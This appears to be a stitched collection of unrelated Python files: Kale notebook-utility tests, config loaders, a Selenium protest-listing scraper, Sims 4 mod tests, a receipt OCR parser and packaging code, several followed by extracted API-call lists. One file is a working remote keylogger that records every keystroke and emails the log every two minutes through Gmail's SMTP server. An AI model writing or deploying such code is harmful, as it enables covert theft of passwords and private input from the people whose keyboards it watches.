ju.text_html_template.format("bytes")),
# ---
(_output_display({'application/javascript': "bytes"}),
ju.javascript_html_template.format("bytes")),
])
def test_generate_html_output(outputs, target):
"""Tests html artifact generation from cell outputs."""
assert target == ju.generate_html_output(outputs)
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_not_exists(pod_utils, tmpdir):
"""Test the uimetadata file is created when it does not exists."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [{
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
assert updated == target
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_from_empty(pod_utils, tmpdir):
"""Test that the uimetadata file is updated inplace correctly."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
# create base tmp file
base = {"outputs": []}
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
json.dump(base, open(filepath, 'w'))
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [{
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
assert updated == target
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_from_not_empty(pod_utils, tmpdir):
"""Test that the uimetadata file is updated inplace correctly."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
# create base tmp file
markdown = {
'type': 'markdown',
'storage': 'inline',
'source': '#Some markdown'
}
base = {"outputs": [markdown]}
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
json.dump(base, open(filepath, 'w'))
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [markdown, {
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
assert updated == target
@mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x)
def test_run_code():
"""Test that Python code runs inside a jupyter kernel successfully."""
# test standard code
code = ("a = 3\nprint(a)", )
ju.run_code(code)
# test magic command
code = ("%%time\nprint('Some dull code')", )
ju.run_code(code)
| [
"kale.utils.jupyter_utils.generate_html_output",
"kale.utils.jupyter_utils.javascript_html_template.format",
"testfixtures.mock.patch",
"kale.utils.jupyter_utils.image_html_template.format",
"kale.utils.jupyter_utils.run_code",
"os.path.join",
"kale.utils.jupyter_utils.update_uimetadata",
"kale.utils.jupyter_utils.text_html_template.format"
] | [((1441, 1489), 'testfixtures.mock.patch', 'mock.patch', (['"""kale.utils.jupyter_utils.pod_utils"""'], {}), "('kale.utils.jupyter_utils.pod_utils')\n", (1451, 1489), False, 'from testfixtures import mock\n'), ((2215, 2263), 'testfixtures.mock.patch', 'mock.patch', (['"""kale.utils.jupyter_utils.pod_utils"""'], {}), "('kale.utils.jupyter_utils.pod_utils')\n", (2225, 2263), False, 'from testfixtures import mock\n'), ((3083, 3131), 'testfixtures.mock.patch', 'mock.patch', (['"""kale.utils.jupyter_utils.pod_utils"""'], {}), "('kale.utils.jupyter_utils.pod_utils')\n", (3093, 3131), False, 'from testfixtures import mock\n'), ((4088, 4159), 'testfixtures.mock.patch', 'mock.patch', (['"""kale.utils.jupyter_utils.process_outputs"""'], {'new': '(lambda x: x)'}), "('kale.utils.jupyter_utils.process_outputs', new=lambda x: x)\n", (4098, 4159), False, 'from testfixtures import mock\n'), ((1798, 1841), 'os.path.join', 'os.path.join', (['tmpdir', '"""tmp_uimetadata.json"""'], {}), "(tmpdir, 'tmp_uimetadata.json')\n", (1810, 1841), False, 'import os\n'), ((1869, 1923), 'kale.utils.jupyter_utils.update_uimetadata', 'ju.update_uimetadata', (['"""test"""'], {'uimetadata_path': 'filepath'}), "('test', uimetadata_path=filepath)\n", (1889, 1923), True, 'from kale.utils import jupyter_utils as ju\n'), ((2625, 2668), 'os.path.join', 'os.path.join', (['tmpdir', '"""tmp_uimetadata.json"""'], {}), "(tmpdir, 'tmp_uimetadata.json')\n", (2637, 2668), False, 'import os\n'), ((2737, 2791), 'kale.utils.jupyter_utils.update_uimetadata', 'ju.update_uimetadata', (['"""test"""'], {'uimetadata_path': 'filepath'}), "('test', uimetadata_path=filepath)\n", (2757, 2791), True, 'from kale.utils import jupyter_utils as ju\n'), ((3620, 3663), 'os.path.join', 'os.path.join', (['tmpdir', '"""tmp_uimetadata.json"""'], {}), "(tmpdir, 'tmp_uimetadata.json')\n", (3632, 3663), False, 'import os\n'), ((3732, 3786), 'kale.utils.jupyter_utils.update_uimetadata', 'ju.update_uimetadata', (['"""test"""'], {'uimetadata_path': 'filepath'}), "('test', uimetadata_path=filepath)\n", (3752, 3786), True, 'from kale.utils import jupyter_utils as ju\n'), ((4318, 4335), 'kale.utils.jupyter_utils.run_code', 'ju.run_code', (['code'], {}), '(code)\n', (4329, 4335), True, 'from kale.utils import jupyter_utils as ju\n'), ((4415, 4432), 'kale.utils.jupyter_utils.run_code', 'ju.run_code', (['code'], {}), '(code)\n', (4426, 4432), True, 'from kale.utils import jupyter_utils as ju\n'), ((1405, 1437), 'kale.utils.jupyter_utils.generate_html_output', 'ju.generate_html_output', (['outputs'], {}), '(outputs)\n', (1428, 1437), True, 'from kale.utils import jupyter_utils as ju\n'), ((940, 982), 'kale.utils.jupyter_utils.image_html_template.format', 'ju.image_html_template.format', (['""""""', '"""bytes"""'], {}), "('', 'bytes')\n", (969, 982), True, 'from kale.utils import jupyter_utils as ju\n'), ((1113, 1150), 'kale.utils.jupyter_utils.text_html_template.format', 'ju.text_html_template.format', (['"""bytes"""'], {}), "('bytes')\n", (1141, 1150), True, 'from kale.utils import jupyter_utils as ju\n'), ((1227, 1270), 'kale.utils.jupyter_utils.javascript_html_template.format', 'ju.javascript_html_template.format', (['"""bytes"""'], {}), "('bytes')\n", (1261, 1270), True, 'from kale.utils import jupyter_utils as ju\n')] |
import yaml
from pkg_resources import resource_stream
def load(filename):
with resource_stream(__name__, filename) as config_file:
return yaml.load(config_file)
def load_cluster_config(name):
return load('{0}.yml'.format(name))
_env = load('context.yml')
_configs = {}
def get_config(env):
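    # Load and cache the cluster config for this environment on first access,
    # then apply any "override" values from context.yml.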
if env not in _configs:
_configs[env] = load_cluster_config(get_cluster_name(env))
_configs[env].update(_env[env].get("override", {}))
return _configs[env]
def get_cluster_name(env):
return _env[env]["cluster"]
| [
"pkg_resources.resource_stream",
"yaml.load"
] | [((86, 121), 'pkg_resources.resource_stream', 'resource_stream', (['__name__', 'filename'], {}), '(__name__, filename)\n', (101, 121), False, 'from pkg_resources import resource_stream\n'), ((153, 175), 'yaml.load', 'yaml.load', (['config_file'], {}), '(config_file)\n', (162, 175), False, 'import yaml\n')] |
import importlib
import sys
import pytest
from firewood import models
gan = ["gan." + model for model in models.gan.__all__]
semantic_segmentation = [
"semantic_segmentation." + model
for model in models.semantic_segmentation.__all__
]
all_models = gan + semantic_segmentation
@pytest.mark.parametrize("model", all_models)
def test_models(model: str) -> None:
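    # Smoke test: import the model module, clear the CLI arguments, and run main().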
module = importlib.import_module("firewood.models." + model)
sys.argv = [""]
module.main()
| [
"pytest.mark.parametrize",
"importlib.import_module"
] | [((292, 336), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""model"""', 'all_models'], {}), "('model', all_models)\n", (315, 336), False, 'import pytest\n'), ((387, 438), 'importlib.import_module', 'importlib.import_module', (["('firewood.models.' + model)"], {}), "('firewood.models.' + model)\n", (410, 438), False, 'import importlib\n')] |
# keylogger_remoto_py
# A Remote Keylogger in Python
import keyboard # for keylogs
import smtplib # to send email using the SMTP protocol (gmail)
# The Semaphore is used to block the current thread
# The Timer is used to run a method after an "interval" amount of time
from threading import Semaphore, Timer
SEND_REPORT_EVERY = 120 # 2 minutes
EMAIL_ADDRESS = "<your_email_address>"
EMAIL_PASSWORD = "<<PASSWORD>>"
class Keylogger:
    def __init__(self, interval):
        # we will pass SEND_REPORT_EVERY as the interval
        self.interval = interval
        # this is the string variable that holds the log of all
        # the keystrokes within "self.interval"
        self.log = ""
        # used to block after setting the on_release listener
        self.semaphore = Semaphore(0)
    def callback(self, event):
        """
        This callback is called whenever a keyboard event occurs
        (i.e. when a key is released, in this example)
        """
        name = event.name
        if len(name) > 1:
            # not a character, a special key (e.g. ctrl, alt, etc.)
            # uppercase it inside []
            if name == "space":
                # " " instead of "space"
                name = " "
            elif name == "enter":
                # add a new line whenever an ENTER is pressed
                name = "[ENTER]\n"
            elif name == "decimal":
                name = "."
            else:
                # replace spaces with underscores
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"
        self.log += name
    def sendmail(self, email, password, message):
        # manages a connection to an SMTP server
        server = smtplib.SMTP(host="smtp.gmail.com", port=587)
        # connect to the SMTP server in TLS mode (for security)
        server.starttls()
        # log in to the email account
        server.login(email, password)
        # send the actual message
        server.sendmail(email, email, message)
        # terminate the session
        server.quit()
    def report(self):
        """
        This function is called every "self.interval"
        It basically sends the keylogs and resets the "self.log" variable
        """
        if self.log:
            # if there is something in the log, report it
            self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
            # you could also print it to a file, whatever you prefer
            # print(self.log)
            self.log = ""
        Timer(interval=self.interval, function=self.report).start()
    def start(self):
        # start the keylogger
        keyboard.on_release(callback=self.callback)
        # start reporting the keylogs
        self.report()
        # block the current thread
        # since on_release() does not block the current thread
        # if we don't block it, nothing will happen when we run the program
        # that's because on_release() starts the listener in a separate thread
        self.semaphore.acquire()
if __name__ == "__main__":
    keylogger = Keylogger(interval=SEND_REPORT_EVERY)
    keylogger.start()
# by Herik_Carvalho
| [
"threading.Timer",
"threading.Semaphore",
"keyboard.on_release",
"smtplib.SMTP"
] | [((789, 801), 'threading.Semaphore', 'Semaphore', (['(0)'], {}), '(0)\n', (798, 801), False, 'from threading import Semaphore, Timer\n'), ((1783, 1828), 'smtplib.SMTP', 'smtplib.SMTP', ([], {'host': '"""smtp.gmail.com"""', 'port': '(587)'}), "(host='smtp.gmail.com', port=587)\n", (1795, 1828), False, 'import smtplib\n'), ((2677, 2720), 'keyboard.on_release', 'keyboard.on_release', ([], {'callback': 'self.callback'}), '(callback=self.callback)\n', (2696, 2720), False, 'import keyboard\n'), ((2558, 2609), 'threading.Timer', 'Timer', ([], {'interval': 'self.interval', 'function': 'self.report'}), '(interval=self.interval, function=self.report)\n', (2563, 2609), False, 'from threading import Semaphore, Timer\n')] |
import json
import os
# make it easy to change this for testing
XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/')
def default_search_folders(app_name):
'''
Return the list of folders to search for configuration files
'''
return [
'%s/cdis/%s' % (XDG_DATA_HOME, app_name),
'/usr/share/cdis/%s' % app_name,
'/var/www/%s' % app_name
]
def find_paths(file_name,app_name,search_folders=None):
'''
Search the given folders for file_name
search_folders defaults to default_search_folders if not specified
return the first path to file_name found
'''
search_folders = search_folders or default_search_folders(app_name)
possible_files = [ os.path.join(folder, file_name) for folder in search_folders ]
return [ path for path in possible_files if os.path.exists(path) ]
def load_json(file_name,app_name,search_folders=None):
'''
json.load(file_name) after finding file_name in search_folders
return the loaded json data or None if file not found
'''
actual_files = find_paths(file_name, app_name, search_folders)
if not actual_files:
return None
with open(actual_files[0], 'r') as reader:
return json.load(reader)
| [
"json.load",
"os.path.join",
"os.getenv",
"os.path.exists"
] | [((79, 120), 'os.getenv', 'os.getenv', (['"""XDG_DATA_HOME"""', '"""/usr/share/"""'], {}), "('XDG_DATA_HOME', '/usr/share/')\n", (88, 120), False, 'import os\n'), ((675, 706), 'os.path.join', 'os.path.join', (['folder', 'file_name'], {}), '(folder, file_name)\n', (687, 706), False, 'import os\n'), ((1157, 1174), 'json.load', 'json.load', (['reader'], {}), '(reader)\n', (1166, 1174), False, 'import json\n'), ((784, 804), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (798, 804), False, 'import os\n')] |
#Instructions from https://www.youtube.com/watch?v=XQgXKtPSzUI&t=174s
#How to open python in command prompt:
#1) Shift+Right Click -> open command prompt
#2) type "conda activate"
#3) type "python"
#To run the python script, type the following line into the command prompt:
#python "C:\Users\travi\Dropbox\Police Killings\Do Files\webscrape.py"
# import packages
import time
import itertools
import csv
import codecs
from bs4 import BeautifulSoup
from selenium import webdriver
from time import sleep
# access website through automated chrome
chrome_path=r"C:\Users\travi\Anaconda3\Lib\site-packages\selenium\chromedriver.exe"
driver = webdriver.Chrome(chrome_path)
driver.get('https://elephrame.com/textbook/BLM')
sleep(2)
# save csv
filename = "../Data/BLM Protests/protests_scrape.csv"
f = codecs.open(filename, encoding='utf-8', mode='w+')
headers = "Location, Date, Subject, Description, Participants\n"
f.write(headers)
# loop clicks over all pages
page_new = 1
pagenum = -1
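# loop over result pages; it ends once pagenum catches up with the page counter read from the site (i.e. the last page)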
while(pagenum < page_new):
#click to next page
if pagenum > -1:
driver.find_element_by_xpath("""//*[@id="blm-results"]/div[1]/ul/li[4]""").click()
# don't overflow website
sleep(2)
#update page numbers for while statement
page_new = driver.find_element_by_xpath("""//*[@id="blm-results"]/div[1]/ul/li[3]/input""").get_attribute("value")
    page_new = int(page_new, 10) # converts from string to numeric
pagenum = pagenum + 1
# append data from this click
locations = driver.find_elements_by_class_name("item-protest-location")
dates = driver.find_elements_by_class_name("protest-start")
participants = driver.find_elements_by_class_name("item-protest-participants")
descriptions = driver.find_elements_by_class_name("item-protest-description")
subjects = driver.find_elements_by_class_name("item-protest-subject")
for (a, b, c, d, e) in zip(locations, dates, subjects, descriptions, participants):
print(a.text, b.text, c.text, d.text, e.text)
f.write(a.text.replace(",", "|") + "," + b.text.replace(",", "|") + "," + c.text.replace(",", "|").replace("Subject(s): ","") + "," + d.text.replace(",", "|").replace("Description: ","") + "," + e.text + "\n")
# close browser
driver.quit()
# close csv file
f.close() | [
"codecs.open",
"selenium.webdriver.Chrome",
"time.sleep"
] | [((666, 695), 'selenium.webdriver.Chrome', 'webdriver.Chrome', (['chrome_path'], {}), '(chrome_path)\n', (682, 695), False, 'from selenium import webdriver\n'), ((747, 755), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (752, 755), False, 'from time import sleep\n'), ((830, 880), 'codecs.open', 'codecs.open', (['filename'], {'encoding': '"""utf-8"""', 'mode': '"""w+"""'}), "(filename, encoding='utf-8', mode='w+')\n", (841, 880), False, 'import codecs\n'), ((1217, 1225), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (1222, 1225), False, 'from time import sleep\n')] |
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Any
from sims4communitylib.modinfo import ModInfo
from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils
from sims4communitylib.testing.common_test_service import CommonTestService
from sims4communitylib.utils.common_function_utils import CommonFunctionUtils
# noinspection PyMissingOrEmptyDocstring
@CommonTestService.test_class(ModInfo.get_identity())
class CommonFunctionUtilsTests:
@staticmethod
@CommonTestService.test(True, True, True, True)
@CommonTestService.test(True, False, True, False)
@CommonTestService.test(True, False, False, True)
@CommonTestService.test(False, False, False, False)
def run_predicates_as_one_should_work_properly(func_result_one: bool, func_result_two: bool, all_must_pass: bool, expected_result: bool):
def _function_one(*_, **__) -> Any:
return func_result_one
def _function_two(*_, **__) -> Any:
return func_result_two
result = CommonFunctionUtils.run_predicates_as_one((_function_one, _function_two), all_must_pass=all_must_pass)()
CommonAssertionUtils.are_equal(result, expected_result)
@staticmethod
@CommonTestService.test(True, False)
@CommonTestService.test(False, True)
def run_predicate_with_reversed_result_should_work_properly(func_result: bool, expected_result: bool):
def _function(*_, **__) -> Any:
return func_result
result = CommonFunctionUtils.run_predicate_with_reversed_result(_function)()
CommonAssertionUtils.are_equal(result, expected_result)
@staticmethod
@CommonTestService.test()
def run_with_arguments_should_work_properly() -> None:
_additional_value = 'No'
_additional_key_word_value = 'What'
normal_val = 'one'
normal_key_val = 'two'
def _function(normal_arg: str, value_one: str, normal_key_arg: str=None, key_value: str=None) -> Any:
CommonAssertionUtils.are_equal(value_one, _additional_value)
CommonAssertionUtils.are_equal(key_value, _additional_key_word_value)
CommonAssertionUtils.are_equal(normal_arg, normal_val)
CommonAssertionUtils.are_equal(normal_key_arg, normal_key_val)
if normal_arg == normal_val and normal_key_arg == normal_key_val and value_one == _additional_value and key_value == _additional_key_word_value:
return True
result = CommonFunctionUtils.run_with_arguments(_function, _additional_value, key_value=_additional_key_word_value)(normal_val, normal_key_arg=normal_key_val)
CommonAssertionUtils.is_true(result, message='Failed to send proper arguments: {}'.format(result))
| [
"sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_predicate_with_reversed_result",
"sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_with_arguments",
"sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal",
"sims4communitylib.modinfo.ModInfo.get_identity",
"sims4communitylib.testing.common_test_service.CommonTestService.test",
"sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_predicates_as_one"
] | [((719, 765), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(True)', '(True)', '(True)', '(True)'], {}), '(True, True, True, True)\n', (741, 765), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((771, 819), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(True)', '(False)', '(True)', '(False)'], {}), '(True, False, True, False)\n', (793, 819), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((825, 873), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(True)', '(False)', '(False)', '(True)'], {}), '(True, False, False, True)\n', (847, 873), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((879, 929), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(False)', '(False)', '(False)', '(False)'], {}), '(False, False, False, False)\n', (901, 929), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((1442, 1477), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(True)', '(False)'], {}), '(True, False)\n', (1464, 1477), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((1483, 1518), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(False)', '(True)'], {}), '(False, True)\n', (1505, 1518), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((1871, 1895), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', ([], {}), '()\n', (1893, 1895), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((640, 662), 'sims4communitylib.modinfo.ModInfo.get_identity', 'ModInfo.get_identity', ([], {}), '()\n', (660, 662), False, 'from sims4communitylib.modinfo import ModInfo\n'), ((1362, 1417), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 'CommonAssertionUtils.are_equal', (['result', 'expected_result'], {}), '(result, expected_result)\n', (1392, 1417), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((1791, 1846), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 'CommonAssertionUtils.are_equal', (['result', 'expected_result'], {}), '(result, expected_result)\n', (1821, 1846), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((1249, 1355), 'sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_predicates_as_one', 'CommonFunctionUtils.run_predicates_as_one', (['(_function_one, _function_two)'], {'all_must_pass': 'all_must_pass'}), '((_function_one, _function_two),\n all_must_pass=all_must_pass)\n', (1290, 1355), False, 'from sims4communitylib.utils.common_function_utils import CommonFunctionUtils\n'), ((1715, 1780), 'sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_predicate_with_reversed_result', 'CommonFunctionUtils.run_predicate_with_reversed_result', (['_function'], {}), '(_function)\n', (1769, 1780), False, 'from sims4communitylib.utils.common_function_utils import CommonFunctionUtils\n'), ((2213, 2273), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 
'CommonAssertionUtils.are_equal', (['value_one', '_additional_value'], {}), '(value_one, _additional_value)\n', (2243, 2273), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((2286, 2355), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 'CommonAssertionUtils.are_equal', (['key_value', '_additional_key_word_value'], {}), '(key_value, _additional_key_word_value)\n', (2316, 2355), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((2368, 2422), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 'CommonAssertionUtils.are_equal', (['normal_arg', 'normal_val'], {}), '(normal_arg, normal_val)\n', (2398, 2422), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((2435, 2497), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 'CommonAssertionUtils.are_equal', (['normal_key_arg', 'normal_key_val'], {}), '(normal_key_arg, normal_key_val)\n', (2465, 2497), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((2701, 2811), 'sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_with_arguments', 'CommonFunctionUtils.run_with_arguments', (['_function', '_additional_value'], {'key_value': '_additional_key_word_value'}), '(_function, _additional_value,\n key_value=_additional_key_word_value)\n', (2739, 2811), False, 'from sims4communitylib.utils.common_function_utils import CommonFunctionUtils\n')] |
__all__ = ['SockFilterError']
import collections
class SockFilterError(Exception):
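    """Exception that records the socket address involved; instances compare equal by address."""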
Tuple = collections.namedtuple('SockFilterError', ['address'])
def __init__(self, address):
self.address = address
def __repr__(self):
return repr(self._tuple)
def __str__(self):
return str(self._tuple)
def __unicode__(self):
return unicode(self._tuple)
def __eq__(self, other):
if not hasattr(other, '_tuple'):
return False
return self._tuple == other._tuple
def __ne__(self, other):
if not hasattr(other, '_tuple'):
return False
return self._tuple != other._tuple
@property
def _tuple(self):
return self.Tuple(address=self.address)
| [
"collections.namedtuple"
] | [((99, 153), 'collections.namedtuple', 'collections.namedtuple', (['"""SockFilterError"""', "['address']"], {}), "('SockFilterError', ['address'])\n", (121, 153), False, 'import collections\n')] |
import re
from pathlib import Path
from setuptools import setup
install_requires = ["croniter>=1.0.1"]
def read(*parts):
return Path(__file__).resolve().parent.joinpath(*parts).read_text().strip()
def read_version():
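    # matches lines of the form: __version__ = "1.2.3" (digits, dots and a/b/rc pre-release tags)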
regexp = re.compile(r"^__version__\W*=\W*\"([\d.abrc]+)\"")
for line in read("aio_background", "__init__.py").splitlines():
match = regexp.match(line)
if match is not None:
return match.group(1)
else:
raise RuntimeError("Cannot find version in aio_background/__init__.py")
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="aio-background",
version=read_version(),
description="A thing to run tasks in the background",
long_description=long_description,
long_description_content_type="text/markdown",
platforms=["macOS", "POSIX", "Windows"],
author="<NAME>",
python_requires=">=3.9",
project_urls={},
author_email="<EMAIL>",
license="MIT",
packages=["aio_background"],
package_dir={"aio_background": "./aio_background"},
package_data={"aio_background": ["py.typed"]},
install_requires=install_requires,
include_package_data=True,
)
| [
"pathlib.Path",
"re.compile"
] | [((240, 294), 're.compile', 're.compile', (['"""^__version__\\\\W*=\\\\W*\\\\"([\\\\d.abrc]+)\\\\\\""""'], {}), '(\'^__version__\\\\W*=\\\\W*\\\\"([\\\\d.abrc]+)\\\\"\')\n', (250, 294), False, 'import re\n'), ((136, 150), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (140, 150), False, 'from pathlib import Path\n')] |
from google.cloud import vision
import io
import re
import os
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "swagger_server/firebase_key.json"
client = vision.ImageAnnotatorClient()
def process_image(image_file):
total = -1
with io.open(image_file, 'rb') as image_file:
content = image_file.read()
image = vision.types.Image(content=content)
# response = client.document_text_detection(image=image)
response = client.text_detection(image=image)
document = response.text_annotations[1:]
items = []
lines = {}
tally = {}
tally2 = {}
first_line = document[0].description
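    # group words into lines: each word is appended to the first stored line whose bottom y lies below the word's top y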
for text in document:
top_x_axis = text.bounding_poly.vertices[0].x
top_y_axis = text.bounding_poly.vertices[0].y
bottom_y_axis = text.bounding_poly.vertices[3].y
if top_y_axis not in lines:
lines[top_y_axis] = [(top_y_axis, bottom_y_axis), []]
for s_top_y_axis, s_item in lines.items():
if top_y_axis < s_item[0][1]:
lines[s_top_y_axis][1].append((top_x_axis, text.description))
break
for _, item in lines.items():
if item[1]:
words = sorted(item[1], key=lambda t: t[0])
items.append(
(item[0], ' '.join([word for _, word in words]), words))
for i in range(len(items)):
items[i] = items[i][1]
orders = []
pattern = re.compile(
"(([0-9]?[x]?[ ]?)([0-9a-zA-Z.']+[ ])+[$£€]?[0-9]+\.[0-9][0-9])")
total_regex = re.compile(
"(([0-9]+/[0-9]+)?[ ]?([0-9]+[:][0-9]+)?)?[ ]?((BALANCE DUE)?(Amount)?((Total)?(total)?(TOTAL)?[ ]?(Due)?(TO PAY)?))[ ]?[:]?[ ]?(([£$€]?)([0-9]+[.][0-9][0-9]))")
for i in range(len(items)):
if pattern.match(items[i]) and not total_regex.match(items[i]) and not re.match("Total Tax", items[i]) and not re.match("Tax", items[i]) and not re.match("Sales Tax", items[i]) and not re.match("Visa", items[i]) and not re.match("Subtotal", items[i]):
orders.append(items[i])
price = "[0-9]+\.[0-9]+"
for i in orders:
p = re.findall(price, i)[0]
tally[i.split(p)[0]] = float(p)
tally2["store"] = first_line
for i in range(len(items)):
if "$" in items[i]:
currency = "USD"
elif "€" in items[i]:
currency = "EUR"
elif "£" in items[i]:
currency = "GBP"
else:
currency = "UKN"
if total_regex.match(items[i]) and not re.match("[$]?[0-9]+\.[0-9][0-9]", items[i]):
tot = items[i]
p = re.findall(price, tot)[0]
tally2["total"] = float(p)
break
else:
tot = -1
tally2["currency"] = currency
return tally, tally2
| [
"google.cloud.vision.types.Image",
"google.cloud.vision.ImageAnnotatorClient",
"re.match",
"re.findall",
"io.open",
"re.compile"
] | [((155, 184), 'google.cloud.vision.ImageAnnotatorClient', 'vision.ImageAnnotatorClient', ([], {}), '()\n', (182, 184), False, 'from google.cloud import vision\n'), ((331, 366), 'google.cloud.vision.types.Image', 'vision.types.Image', ([], {'content': 'content'}), '(content=content)\n', (349, 366), False, 'from google.cloud import vision\n'), ((1421, 1498), 're.compile', 're.compile', (['"""(([0-9]?[x]?[ ]?)([0-9a-zA-Z.\']+[ ])+[$£€]?[0-9]+\\\\.[0-9][0-9])"""'], {}), '("(([0-9]?[x]?[ ]?)([0-9a-zA-Z.\']+[ ])+[$£€]?[0-9]+\\\\.[0-9][0-9])")\n', (1431, 1498), False, 'import re\n'), ((1526, 1708), 're.compile', 're.compile', (['"""(([0-9]+/[0-9]+)?[ ]?([0-9]+[:][0-9]+)?)?[ ]?((BALANCE DUE)?(Amount)?((Total)?(total)?(TOTAL)?[ ]?(Due)?(TO PAY)?))[ ]?[:]?[ ]?(([£$€]?)([0-9]+[.][0-9][0-9]))"""'], {}), "(\n '(([0-9]+/[0-9]+)?[ ]?([0-9]+[:][0-9]+)?)?[ ]?((BALANCE DUE)?(Amount)?((Total)?(total)?(TOTAL)?[ ]?(Due)?(TO PAY)?))[ ]?[:]?[ ]?(([£$€]?)([0-9]+[.][0-9][0-9]))'\n )\n", (1536, 1708), False, 'import re\n'), ((242, 267), 'io.open', 'io.open', (['image_file', '"""rb"""'], {}), "(image_file, 'rb')\n", (249, 267), False, 'import io\n'), ((2101, 2121), 're.findall', 're.findall', (['price', 'i'], {}), '(price, i)\n', (2111, 2121), False, 'import re\n'), ((1820, 1851), 're.match', 're.match', (['"""Total Tax"""', 'items[i]'], {}), "('Total Tax', items[i])\n", (1828, 1851), False, 'import re\n'), ((1860, 1885), 're.match', 're.match', (['"""Tax"""', 'items[i]'], {}), "('Tax', items[i])\n", (1868, 1885), False, 'import re\n'), ((1894, 1925), 're.match', 're.match', (['"""Sales Tax"""', 'items[i]'], {}), "('Sales Tax', items[i])\n", (1902, 1925), False, 'import re\n'), ((1934, 1960), 're.match', 're.match', (['"""Visa"""', 'items[i]'], {}), "('Visa', items[i])\n", (1942, 1960), False, 'import re\n'), ((1969, 1999), 're.match', 're.match', (['"""Subtotal"""', 'items[i]'], {}), "('Subtotal', items[i])\n", (1977, 1999), False, 'import re\n'), ((2498, 2543), 're.match', 're.match', (['"""[$]?[0-9]+\\\\.[0-9][0-9]"""', 'items[i]'], {}), "('[$]?[0-9]+\\\\.[0-9][0-9]', items[i])\n", (2506, 2543), False, 'import re\n'), ((2587, 2609), 're.findall', 're.findall', (['price', 'tot'], {}), '(price, tot)\n', (2597, 2609), False, 'import re\n')] |
import numpy
""" Utility variables and functions
"""
aa2au = 1.8897261249935897 # bohr / AA
# converts nuclear charge to atom label
Z2LABEL = {
1: 'H', 2: 'He',
3: 'Li', 4: 'Be', 5: 'B', 6: 'C', 7: 'N', 8: 'O', 9: 'F', 10: 'Ne',
